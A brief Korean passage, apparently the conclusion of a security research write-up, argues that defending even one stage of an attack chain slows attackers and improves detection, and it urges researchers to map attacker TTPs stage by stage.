공격자의 모든 위협을 막기란 쉽지 않다. 다만 공격의 전체 시나리오에서 최종 목적에 도달하기 전까지의 구간 중

하나의 구간이라도 방어를 한다면 공격자의 공격을 늦추고, 공격의 탐지의 가능성을 높일 수 있다. 그렇기 때문에

우리 보안연구자들은 공격자의 TTP를 각 공격 구간별마다 사용된 기술을 정확히 식별하고 공격자의 행동에 맞추어

공격자의 자원을 효율적으로 무력화할 수 있는 방안에 대해 연구해야 한다.


-----